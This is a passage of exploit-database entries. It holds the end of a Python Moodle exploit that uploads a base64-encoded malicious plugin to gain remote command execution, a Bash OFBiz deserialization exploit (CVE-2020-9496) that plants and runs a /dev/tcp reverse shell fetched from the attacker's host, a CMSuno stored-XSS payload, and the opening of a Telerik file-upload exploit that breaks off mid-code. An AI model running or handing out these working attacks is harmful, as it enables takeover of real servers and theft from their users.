'tool/dataprivacy:makedatarequestsforchildren','1'),('tool/dataprivacy:requestdelete','1'),('tool/policy:acceptbehalf','1'),('moodle/category:manage','1'),('moodle/category:viewcourselist','1'),('moodle/category:viewhiddencategories','1'),('moodle/cohort:assign','1'),('moodle/cohort:manage','1'),('moodle/competency:competencymanage','1'),('moodle/competency:competencyview','1'),('moodle/competency:templatemanage','1'),('moodle/competency:templateview','1'),('moodle/course:create','1'),('moodle/course:request','1'),('moodle/site:approvecourse','1'),('repository/contentbank:accesscoursecategorycontent','1'),('repository/contentbank:accessgeneralcontent','1'),('block/recent_activity:viewaddupdatemodule','1'),('block/recent_activity:viewdeletemodule','1'),('contenttype/h5p:access','1'),('contenttype/h5p:upload','1'),('contenttype/h5p:useeditor','1'),('enrol/category:config','1'),('enrol/cohort:config','1'),('enrol/cohort:unenrol','1'),('enrol/database:config','1'),('enrol/database:unenrol','1'),('enrol/flatfile:manage','1'),('enrol/flatfile:unenrol','1'),('enrol/guest:config','1'),('enrol/imsenterprise:config','1'),('enrol/ldap:manage','1'),('enrol/lti:config','1'),('enrol/lti:unenrol','1'),('enrol/manual:config','1'),('enrol/manual:enrol','1'),('enrol/manual:manage','1'),('enrol/manual:unenrol','1'),('enrol/manual:unenrolself','1'),('enrol/meta:config','1'),('enrol/meta:selectaslinked','1'),('enrol/meta:unenrol','1'),('enrol/mnet:config','1'),('enrol/paypal:config','1'),('enrol/paypal:manage','1'),('enrol/paypal:unenrol','1'),('enrol/paypal:unenrolself','1'),('enrol/self:config','1'),('enrol/self:holdkey','1'),('enrol/self:manage','1'),('enrol/self:unenrol','1'),('enrol/self:unenrolself','1'),('gradeexport/ods:publish','1'),('gradeexport/ods:view','1'),('gradeexport/txt:publish','1'),('gradeexport/txt:view','1'),('gradeexport/xls:publish','1'),('gradeexport/xls:view','1'),('gradeexport/xml:publish','1'),('gradeexport/xml:view','1'),('gradeimport/csv:view','1'),('gradeimport/direct:view','1'),('gradeimport/xml:publish','1'),('gradeimport/xml:view','1'),('gradereport/grader:view','1'),('gradereport/history:view','1'),('gradereport/outcomes:view','1'),('gradereport/overview:view','1'),('gradereport/singleview:view','1'),('gradereport/user:view','1'),('mod/assign:addinstance','1'),('mod/assignment:addinstance','1'),('mod/book:addinstance','1'),('mod/chat:addinstance','1'),('mod/choice:addinstance','1'),('mod/data:addinstance','1'),('mod/feedback:addinstance','1'),('mod/folder:addinstance','1'),('mod/forum:addinstance','1'),('mod/glossary:addinstance','1'),('mod/h5pactivity:addinstance','1'),('mod/imscp:addinstance','1'),('mod/label:addinstance','1'),('mod/lesson:addinstance','1'),('mod/lti:addcoursetool','1'),('mod/lti:addinstance','1'),('mod/lti:addmanualinstance','1'),('mod/lti:addpreconfiguredinstance','1'),('mod/lti:requesttooladd','1'),('mod/page:addinstance','1'),('mod/quiz:addinstance','1'),('mod/resource:addinstance','1'),('mod/scorm:addinstance','1'),('mod/survey:addinstance','1'),('mod/url:addinstance','1'),('mod/wiki:addinstance','1'),('mod/workshop:addinstance','1'),('moodle/analytics:listinsights','1'),('moodle/backup:anonymise','1'),('moodle/backup:backupcourse','1'),('moodle/backup:backupsection','1'),('moodle/backup:backuptargetimport','1'),('moodle/backup:configure','1'),('moodle/backup:downloadfile','1'),('moodle/backup:userinfo','1'),('moodle/badges:awardbadge','1'),('moodle/badges:configurecriteria','1'),('moodle/badges:configuredetails','1'),('moodle/badges:configuremessages','1'),('moodle/badges:createbadge','1'),('moodle/badges:deletebadge','1'),('moodle/badges:earnbadge','1'),('moodle/badges:revokebadge','1'),('moodle/badges:viewawarded','1'),('moodle/badges:viewbadges','1'),('moodle/calendar:manageentries','1'),('moodle/calendar:managegroupentries','1'),('moodle/calendar:manageownentries','1'),('moodle/cohort:view','1'),('moodle/comment:delete','1'),('moodle/comment:post','1'),('moodle/comment:view','1'),('moodle/competency:competencygrade','1'),('moodle/competency:coursecompetencygradable','1'),('moodle/competency:coursecompetencymanage','1'),('moodle/competency:coursecompetencyview','1'),('moodle/contentbank:access','1'),('moodle/contentbank:deleteanycontent','1'),('moodle/contentbank:deleteowncontent','1'),('moodle/contentbank:manageanycontent','1'),('moodle/contentbank:manageowncontent','1'),('moodle/contentbank:upload','1'),('moodle/contentbank:useeditor','1'),('moodle/course:bulkmessaging','1'),('moodle/course:changecategory','1'),('moodle/course:changefullname','1'),('moodle/course:changeidnumber','1'),('moodle/course:changelockedcustomfields','1'),('moodle/course:changeshortname','1'),('moodle/course:changesummary','1'),('moodle/course:creategroupconversations','1'),('moodle/course:delete','1'),('moodle/course:enrolconfig','1'),('moodle/course:enrolreview','1'),('moodle/course:ignorefilesizelimits','1'),('moodle/course:isincompletionreports','1'),('moodle/course:managefiles','1'),('moodle/course:managegroups','1'),('moodle/course:managescales','1'),('moodle/course:markcomplete','1'),('moodle/course:movesections','1'),('moodle/course:overridecompletion','1'),('moodle/course:renameroles','1'),('moodle/course:reset','1'),('moodle/course:reviewotherusers','1'),('moodle/course:sectionvisibility','1'),('moodle/course:setcurrentsection','1'),('moodle/course:setforcedlanguage','1'),('moodle/course:tag','1'),('moodle/course:update','1'),('moodle/course:useremail','1'),('moodle/course:view','1'),('moodle/course:viewhiddencourses','1'),('moodle/course:viewhiddensections','1'),('moodle/course:viewhiddenuserfields','1'),('moodle/course:viewparticipants','1'),('moodle/course:viewscales','1'),('moodle/course:viewsuspendedusers','1'),('moodle/course:visibility','1'),('moodle/filter:manage','1'),('moodle/grade:edit','1'),('moodle/grade:export','1'),('moodle/grade:hide','1'),('moodle/grade:import','1'),('moodle/grade:lock','1'),('moodle/grade:manage','1'),('moodle/grade:managegradingforms','1'),('moodle/grade:manageletters','1'),('moodle/grade:manageoutcomes','1'),('moodle/grade:unlock','1'),('moodle/grade:view','1'),('moodle/grade:viewall','1'),('moodle/grade:viewhidden','1'),('moodle/notes:manage','1'),('moodle/notes:view','1'),('moodle/question:add','1'),('moodle/question:editall','1'),('moodle/question:editmine','1'),('moodle/question:flag','1'),('moodle/question:managecategory','1'),('moodle/question:moveall','1'),('moodle/question:movemine','1'),('moodle/question:tagall','1'),('moodle/question:tagmine','1'),('moodle/question:useall','1'),('moodle/question:usemine','1'),('moodle/question:viewall','1'),('moodle/question:viewmine','1'),('moodle/rating:rate','1'),('moodle/rating:view','1'),('moodle/rating:viewall','1'),('moodle/rating:viewany','1'),('moodle/restore:configure','1'),('moodle/restore:restoreactivity','1'),('moodle/restore:restorecourse','1'),('moodle/restore:restoresection','1'),('moodle/restore:restoretargetimport','1'),('moodle/restore:rolldates','1'),('moodle/restore:uploadfile','1'),('moodle/restore:userinfo','1'),('moodle/restore:viewautomatedfilearea','1'),('moodle/role:assign','1'),('moodle/role:override','1'),('moodle/role:review','1'),('moodle/role:safeoverride','1'),('moodle/role:switchroles','1'),('moodle/site:viewreports','1'),('moodle/user:loginas','1'),('moodle/user:viewdetails','1'),('moodle/user:viewhiddendetails','1'),('report/completion:view','1'),('report/log:view','1'),('report/log:viewtoday','1'),('report/loglive:view','1'),('report/outline:view','1'),('report/outline:viewuserreport','1'),('report/participation:view','1'),('report/progress:view','1'),('report/stats:view','1'),('repository/contentbank:accesscoursecontent','1'),('tool/monitor:managerules','1'),('tool/monitor:subscribe','1'),('tool/recyclebin:deleteitems','1'),('tool/recyclebin:restoreitems','1'),('tool/recyclebin:viewitems','1'),('webservice/rest:use','1'),('webservice/soap:use','1'),('webservice/xmlrpc:use','1'),('atto/h5p:addembed','1'),('atto/recordrtc:recordaudio','1'),('atto/recordrtc:recordvideo','1'),('booktool/exportimscp:export','1'),('booktool/importhtml:import','1'),('booktool/print:print','1'),('forumreport/summary:view','1'),('forumreport/summary:viewall','1'),('mod/assign:editothersubmission','1'),('mod/assign:exportownsubmission','1'),('mod/assign:grade','1'),('mod/assign:grantextension','1'),('mod/assign:manageallocations','1'),('mod/assign:managegrades','1'),('mod/assign:manageoverrides','1'),('mod/assign:receivegradernotifications','1'),('mod/assign:releasegrades','1'),('mod/assign:revealidentities','1'),('mod/assign:reviewgrades','1'),('mod/assign:showhiddengrader','1'),('mod/assign:submit','1'),('mod/assign:view','1'),('mod/assign:viewblinddetails','1'),('mod/assign:viewgrades','1'),('mod/assignment:exportownsubmission','1'),('mod/assignment:grade','1'),('mod/assignment:submit','1'),('mod/assignment:view','1'),('mod/book:edit','1'),('mod/book:read','1'),('mod/book:viewhiddenchapters','1'),('mod/chat:chat','1'),('mod/chat:deletelog','1'),('mod/chat:exportparticipatedsession','1'),('mod/chat:exportsession','1'),('mod/chat:readlog','1'),('mod/chat:view','1'),('mod/choice:choose','1'),('mod/choice:deleteresponses','1'),('mod/choice:downloadresponses','1'),('mod/choice:readresponses','1'),('mod/choice:view','1'),('mod/data:approve','1'),('mod/data:comment','1'),('mod/data:exportallentries','1'),('mod/data:exportentry','1'),('mod/data:exportownentry','1'),('mod/data:exportuserinfo','1'),('mod/data:managecomments','1'),('mod/data:manageentries','1'),('mod/data:managetemplates','1'),('mod/data:manageuserpresets','1'),('mod/data:rate','1'),('mod/data:view','1'),('mod/data:viewallratings','1'),('mod/data:viewalluserpresets','1'),('mod/data:viewanyrating','1'),('mod/data:viewentry','1'),('mod/data:viewrating','1'),('mod/data:writeentry','1'),('mod/feedback:complete','1'),('mod/feedback:createprivatetemplate','1'),('mod/feedback:createpublictemplate','1'),('mod/feedback:deletesubmissions','1'),('mod/feedback:deletetemplate','1'),('mod/feedback:edititems','1'),('mod/feedback:mapcourse','1'),('mod/feedback:receivemail','1'),('mod/feedback:view','1'),('mod/feedback:viewanalysepage','1'),('mod/feedback:viewreports','1'),('mod/folder:managefiles','1'),('mod/folder:view','1'),('mod/forum:addnews','1'),('mod/forum:addquestion','1'),('mod/forum:allowforcesubscribe','1'),('mod/forum:canoverridecutoff','1'),('mod/forum:canoverridediscussionlock','1'),('mod/forum:canposttomygroups','1'),('mod/forum:cantogglefavourite','1'),('mod/forum:createattachment','1'),('mod/forum:deleteanypost','1'),('mod/forum:deleteownpost','1'),('mod/forum:editanypost','1'),('mod/forum:exportdiscussion','1'),('mod/forum:exportforum','1'),('mod/forum:exportownpost','1'),('mod/forum:exportpost','1'),('mod/forum:grade','1'),('mod/forum:managesubscriptions','1'),('mod/forum:movediscussions','1'),('mod/forum:pindiscussions','1'),('mod/forum:postprivatereply','1'),('mod/forum:postwithoutthrottling','1'),('mod/forum:rate','1'),('mod/forum:readprivatereplies','1'),('mod/forum:replynews','1'),('mod/forum:replypost','1'),('mod/forum:splitdiscussions','1'),('mod/forum:startdiscussion','1'),('mod/forum:viewallratings','1'),('mod/forum:viewanyrating','1'),('mod/forum:viewdiscussion','1'),('mod/forum:viewhiddentimedposts','1'),('mod/forum:viewqandawithoutposting','1'),('mod/forum:viewrating','1'),('mod/forum:viewsubscribers','1'),('mod/glossary:approve','1'),('mod/glossary:comment','1'),('mod/glossary:export','1'),('mod/glossary:exportentry','1'),('mod/glossary:exportownentry','1'),('mod/glossary:import','1'),('mod/glossary:managecategories','1'),('mod/glossary:managecomments','1'),('mod/glossary:manageentries','1'),('mod/glossary:rate','1'),('mod/glossary:view','1'),('mod/glossary:viewallratings','1'),('mod/glossary:viewanyrating','1'),('mod/glossary:viewrating','1'),('mod/glossary:write','1'),('mod/h5pactivity:reviewattempts','1'),('mod/h5pactivity:submit','1'),('mod/h5pactivity:view','1'),('mod/imscp:view','1'),('mod/label:view','1'),('mod/lesson:edit','1'),('mod/lesson:grade','1'),('mod/lesson:manage','1'),('mod/lesson:manageoverrides','1'),('mod/lesson:view','1'),('mod/lesson:viewreports','1'),('mod/lti:admin','1'),('mod/lti:manage','1'),('mod/lti:view','1'),('mod/page:view','1'),('mod/quiz:attempt','1'),('mod/quiz:deleteattempts','1'),('mod/quiz:emailconfirmsubmission','1'),('mod/quiz:emailnotifysubmission','1'),('mod/quiz:emailwarnoverdue','1'),('mod/quiz:grade','1'),('mod/quiz:ignoretimelimits','1'),('mod/quiz:manage','1'),('mod/quiz:manageoverrides','1'),('mod/quiz:preview','1'),('mod/quiz:regrade','1'),('mod/quiz:reviewmyattempts','1'),('mod/quiz:view','1'),('mod/quiz:viewreports','1'),('mod/resource:view','1'),('mod/scorm:deleteownresponses','1'),('mod/scorm:deleteresponses','1'),('mod/scorm:savetrack','1'),('mod/scorm:skipview','1'),('mod/scorm:viewreport','1'),('mod/scorm:viewscores','1'),('mod/survey:download','1'),('mod/survey:participate','1'),('mod/survey:readresponses','1'),('mod/url:view','1'),('mod/wiki:createpage','1'),('mod/wiki:editcomment','1'),('mod/wiki:editpage','1'),('mod/wiki:managecomment','1'),('mod/wiki:managefiles','1'),('mod/wiki:managewiki','1'),('mod/wiki:overridelock','1'),('mod/wiki:viewcomment','1'),('mod/wiki:viewpage','1'),('mod/workshop:allocate','1'),('mod/workshop:deletesubmissions','1'),('mod/workshop:editdimensions','1'),('mod/workshop:exportsubmissions','1'),('mod/workshop:ignoredeadlines','1'),('mod/workshop:manageexamples','1'),('mod/workshop:overridegrades','1'),('mod/workshop:peerassess','1'),('mod/workshop:publishsubmissions','1'),('mod/workshop:submit','1'),('mod/workshop:switchphase','1'),('mod/workshop:view','1'),('mod/workshop:viewallassessments','1'),('mod/workshop:viewallsubmissions','1'),('mod/workshop:viewauthornames','1'),('mod/workshop:viewauthorpublished','1'),('mod/workshop:viewpublishedsubmissions','1'),('mod/workshop:viewreviewernames','1'),('moodle/backup:backupactivity','1'),('moodle/competency:coursecompetencyconfigure','1'),('moodle/course:activityvisibility','1'),('moodle/course:ignoreavailabilityrestrictions','1'),('moodle/course:manageactivities','1'),('moodle/course:togglecompletion','1'),('moodle/course:viewhiddenactivities','1'),('moodle/h5p:deploy','1'),('moodle/h5p:setdisplayoptions','1'),('moodle/h5p:updatelibraries','1'),('moodle/site:accessallgroups','1'),('moodle/site:managecontextlocks','1'),('moodle/site:trustcontent','1'),('moodle/site:viewanonymousevents','1'),('moodle/site:viewfullnames','1'),('moodle/site:viewuseridentity','1'),('quiz/grading:viewidnumber','1'),('quiz/grading:viewstudentnames','1'),('quiz/statistics:view','1'),('quizaccess/seb:bypassseb','1'),('quizaccess/seb:manage_filemanager_sebconfigfile','1'),('quizaccess/seb:manage_seb_activateurlfiltering','1'),('quizaccess/seb:manage_seb_allowedbrowserexamkeys','1'),('quizaccess/seb:manage_seb_allowreloadinexam','1'),('quizaccess/seb:manage_seb_allowspellchecking','1'),('quizaccess/seb:manage_seb_allowuserquitseb','1'),('quizaccess/seb:manage_seb_enableaudiocontrol','1'),('quizaccess/seb:manage_seb_expressionsallowed','1'),('quizaccess/seb:manage_seb_expressionsblocked','1'),('quizaccess/seb:manage_seb_filterembeddedcontent','1'),('quizaccess/seb:manage_seb_linkquitseb','1'),('quizaccess/seb:manage_seb_muteonstartup','1'),('quizaccess/seb:manage_seb_quitpassword','1'),('quizaccess/seb:manage_seb_regexallowed','1'),('quizaccess/seb:manage_seb_regexblocked','1'),('quizaccess/seb:manage_seb_requiresafeexambrowser','1'),('quizaccess/seb:manage_seb_showkeyboardlayout','1'),('quizaccess/seb:manage_seb_showreloadbutton','1'),('quizaccess/seb:manage_seb_showsebdownloadlink','1'),('quizaccess/seb:manage_seb_showsebtaskbar','1'),('quizaccess/seb:manage_seb_showtime','1'),('quizaccess/seb:manage_seb_showwificontrol','1'),('quizaccess/seb:manage_seb_templateid','1'),('quizaccess/seb:manage_seb_userconfirmquit','1'),('repository/areafiles:view','1'),('repository/boxnet:view','1'),('repository/contentbank:view','1'),('repository/coursefiles:view','1'),('repository/dropbox:view','1'),('repository/equella:view','1'),('repository/filesystem:view','1'),('repository/flickr:view','1'),('repository/flickr_public:view','1'),('repository/googledocs:view','1'),('repository/local:view','1'),('repository/merlot:view','0'),('repository/nextcloud:view','1'),('repository/onedrive:view','1'),('repository/picasa:view','1'),('repository/recent:view','1'),('repository/s3:view','1'),('repository/skydrive:view','1'),('repository/upload:view','1'),('repository/url:view','1'),('repository/user:view','1'),('repository/webdav:view','1'),('repository/wikimedia:view','1'),('repository/youtube:view','1'),('block/activity_modules:addinstance','1'),('block/activity_results:addinstance','1'),('block/admin_bookmarks:addinstance','1'),('block/badges:addinstance','1'),('block/blog_menu:addinstance','1'),('block/blog_recent:addinstance','1'),('block/blog_tags:addinstance','1'),('block/calendar_month:addinstance','1'),('block/calendar_upcoming:addinstance','1'),('block/comments:addinstance','1'),('block/completionstatus:addinstance','1'),('block/course_list:addinstance','1'),('block/course_summary:addinstance','1'),('block/feedback:addinstance','1'),('block/globalsearch:addinstance','1'),('block/glossary_random:addinstance','1'),('block/html:addinstance','1'),('block/login:addinstance','1'),('block/mentees:addinstance','1'),('block/mnet_hosts:addinstance','1'),('block/myprofile:addinstance','1'),('block/navigation:addinstance','1'),('block/news_items:addinstance','1'),('block/online_users:addinstance','1'),('block/online_users:viewlist','1'),('block/private_files:addinstance','1'),('block/quiz_results:addinstance','1'),('block/recent_activity:addinstance','1'),('block/rss_client:addinstance','1'),('block/rss_client:manageanyfeeds','1'),('block/rss_client:manageownfeeds','1'),('block/search_forums:addinstance','1'),('block/section_links:addinstance','1'),('block/selfcompletion:addinstance','1'),('block/settings:addinstance','1'),('block/site_main_menu:addinstance','1'),('block/social_activities:addinstance','1'),('block/tag_flickr:addinstance','1'),('block/tag_youtube:addinstance','1'),('block/tags:addinstance','1'),('moodle/block:edit','1'),('moodle/block:view','1'),('moodle/site:manageblocks','1'),('savechanges','Save changes')] r = session.post(url + '/admin/roles/define.php', params=data_get, data=data_post) # Above we modify description field, so, if script find that description on site, we are good. if random_desc not in r.text: p6.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nTrouble updating fields\n") exit(1) else: r = session.get(url + '/admin/search.php') if "Install plugins" not in r.text: p6.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nModified fields but the options to install plugins have not been enabled.") print(Color.RED + "- (This is weird, sometimes he does it, sometimes he doesn't!!) Try again.\n") exit(1) sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] p6.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) return session, sess_key def zipb64_up(session, url, sess_key, teacher_user, course_id): ''' Doing upload of zip file as base64 binary data * https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/ ''' p7 = log.progress("Uploading malicious " + Color.BLUE + ".zip" + Color.END + " file") r = session.get(url + '/admin/tool/installaddon/index.php') zipfile_id = re.findall(r'name="zipfile" id="id_zipfile" value="(.*?)"', r.text)[0] client_id = re.findall(r'"client_id":"(.*?)"', r.text)[0] # Upupup data_get = {"action":"upload"} data_post = { "title" : "", "author" : teacher_user, "license" : "unknown", "itemid" : [zipfile_id, zipfile_id], "accepted_types[]" : [".zip",".zip"], "repo_id" : course_id, "p" : "", "page" : "", "env" : "filepicker", "sesskey" : sess_key, "client_id" : client_id, "maxbytes" : "-1", "areamaxbytes" : "-1", "ctx_id" : "1", "savepath" : "/" } zip_b64 = 'UEsDBAoAAAAAAOVa0VAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAACATtFQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAAB2bdFQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACAD4W9FQA9MUliAAAAAeAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsS/IKFAoriwuSc3VUIl3dw2JVk/OTVGP1bRWsLcDAFBLAwQUAAAACAB6bdFQtXxvb0EAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDM0NzCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAA5VrRUAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGAB/2bACX0TWAWRC9B9fRNYBhvTzH19E1gFQSwECHwAKAAAAAACATtFQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgArE3mRVJE1gGOG/QfX0TWAYb08x9fRNYBUEsBAh8ACgAAAAAAdm3RUAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAMIcIaZyRNYBwhwhpnJE1gGOG/QfX0TWAVBLAQIfABQAAAAIAPhb0VAD0xSWIAAAAB4AAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgA1t0sN2BE1gHW3Sw3YETWAfYt6i9fRNYBUEsBAh8AFAAAAAgAem3RULV8b29BAAAASQAAAA8AJAAAAAAAAAAgAAAAygAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAO6e2qlyRNYB7p7aqXJE1gFkQvQfX0TWAVBLBQYAAAAABQAFANsBAAA4AQAAAAA=' zip_file_bytes = zip_b64.encode('utf-8') zip_file_b64 = base64.decodebytes(zip_file_bytes) data_file = [ ('repo_upload_file', ('rce.zip', zip_file_b64, 'application/zip'))] r = session.post(url + '/repository/repository_ajax.php', params=data_get, data=data_post, files=data_file) if "rce.zip" not in r.text: p7.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError uploading zip file.\n") exit(1) # Trying to load file data_post = { "sesskey" : sess_key, "_qf__tool_installaddon_installfromzip_form" : "1", "mform_showmore_id_general" : "0", "mform_isexpanded_id_general" : "1", "zipfile" : zipfile_id, "plugintype" : "", "rootdir" : "", "submitbutton" : "Install plugin from the ZIP file" } r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post) if "Validation successful, installation can continue" not in r.text: p7.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError uploading zip file, problems on plugin install.\n") exit(1) # Confirm load zip_storage = re.findall(r'installzipstorage=(.*?)&', r.url)[0] data_post = { "installzipcomponent" : "block_rce", "installzipstorage" : zip_storage, "installzipconfirm" : "1", "sesskey" : sess_key } r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post) if "Current release information" not in r.text: p7.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError uploading zip file, confirmation problems.\n") exit(1) p7.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) return session def moodle_RCE(url, command): ''' Remote Command Execution on system with plugin installed (malicious zip file) ''' p8 = log.progress("Executing " + Color.BLUE + command + Color.END) time.sleep(1) data_get = {"cmd" : command} try: r = session.get(url + '/blocks/rce/lang/en/block_rce.php', params=data_get, timeout=3) p8.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) print("\n" + Color.YELLOW + r.text + Color.END) except requests.exceptions.Timeout as e: p8.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) pass print("[" + Color.YELLOW + "+" + Color.END + "]" + Color.GREEN + " Keep breaking ev3rYthiNg!!\n" + Color.END) if __name__ == '__main__': args = arguments() session, id_user, sess_key = login(args.url, args.username, args.password, args.id_course, args.teacher_cookie) enrol2rce(session, args.url, args.id_manager, args.username, args.id_course, args.teacher_cookie, args.command)

# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments # Date: 2021-08-04 # Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd) # Vendor Homepage: https://ofbiz.apache.org/index.html # Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip # Version: 17.12.01 # Tested on: Linux # CVE : CVE-2020-9496 # Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/ # Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE. #!/usr/bin/env bash # Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. # This issue was reported to the security team by Alvaro Munoz [email protected] from the GitHub Security Lab team. # # This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. # A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution. # # Steps to exploit: # # Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80) # Step 2: Start nc listener (Recommended 8001). # Step 3: Run the exploit. url='https://127.0.0.1' # CHANGE THIS port=8443 # CHANGE THIS function helpPanel(){ echo -e "\nUsage:" echo -e "\t[-i] Attacker's IP" echo -e "\t[-p] Attacker's Port" echo -e "\t[-h] Show help pannel" exit 1 } function ctrl_c(){ echo -e "\n\n[!] Exiting...\n" exit 1 } # Ctrl + C trap ctrl_c INT function webRequest(){ echo -e "\n[*] Creating a shell file with bash\n" echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh echo -e "[*] Downloading YsoSerial JAR File\n" wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar echo -e "[*] Generating a JAR payload\n" payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n") echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5 curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null echo -e "[*] Generating a second JAR payload" payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n") echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5 curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null echo -e "\n[*]Deleting Files..." rm ysoserial-master-d367e379d9-1.jar && rm shell.sh } declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do case $arg in i) ip=$OPTARG; let parameter_enable+=1;; p) ncport=$OPTARG; let parameter_enable+=1;; h) helpPanel;; esac done if [ $parameter_enable -ne 2 ]; then helpPanel else webRequest fi

# Exploit Title: CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 03-08-2021 # Exploit Author: splint3rsec # Vendor Homepage: https://github.com/boiteasite # Software Link: https://github.com/boiteasite/cmsuno # Affected Version(s): CMSuno 1.7 (and prior) # CVE : CVE-2021-36654 CMSuno version 1.7 and prior is vulnerable to a stored cross-site scripting. The attacker must be authenticated to exploit the vulnerability. The payload injection is done while updating the template's image filename, vulnerable parameter is *tgo* Steps to reproduce: 1. Go to /uno.php and click on *plugins* 2. Click on *Logo* 3. Choose a random picture in your files repo, click on save and intercept the request 4. Edit the POST request to /uno/template/uno1/uno1.php by modifying the tgo parameter's value to ")}</style><script>VULN JS CODE HERE</script> 5. Forward the request and click on *publish* 6. Click on *See the website* 7. XSS

# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated) # Date: 21/03/2021 # Exploit Author: Amin Bohio # Original Research & Code By: Paul Taylor / Foregenix Ltd # Original Exploit: https://github.com/bao7uo/RAU_crypto # Vendor Homepage: https://www.gfi.com # Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver # Vulnerable Versions: GFI Mail Archiver <= 15.1 # Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload # Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference # Tested on: Windows & Linux # Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver #!/usr/bin/python3 # Original Telerik Exploit Author: Paul Taylor / @bao7uo # https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py # Modified by: Amin Bohio import sys import base64 import json import re import requests import os from Crypto.Cipher import AES from Crypto.Hash import HMAC from Crypto.Hash import SHA256 from Crypto.Hash import SHA1 from struct import Struct from operator import xor from itertools import starmap import binascii from requests.packages.urllib3.exceptions import InsecureRequestWarning # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 1 of 2 # Warning, the below prevents certificate warnings, # and verify = False (CERT_VERIFY prevents them being verified requests.packages.urllib3.disable_warnings(InsecureRequestWarning) CERT_VERIFY = False # ****************************************** # ****************************************** class PBKDF: def sha1(v): hl = SHA1.new() hl.update(v) return hl.digest() def derive1(password, salt): hash = (password + salt).encode() for i in range(0, 99): hash = PBKDF.sha1(hash) result = PBKDF.sha1(hash) i = 1 while len(result) < 48: result += PBKDF.sha1(str(i).encode() + hash) i += 1 return result def hmacsha1(v): hl = PBKDF.mac.copy() hl.update(v) return bytearray(hl.digest()) def derive2(password, salt): # Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py result_length = 48 PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new()) result = [] for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1): rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b)) for i in range(999): u = PBKDF.hmacsha1(u) rv = starmap(xor, zip(rv, u)) result.extend(rv) result = b''.join(map(bytes, [result]))[:result_length] return result def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])): if type == 1: result = PBKDF.derive1(password, 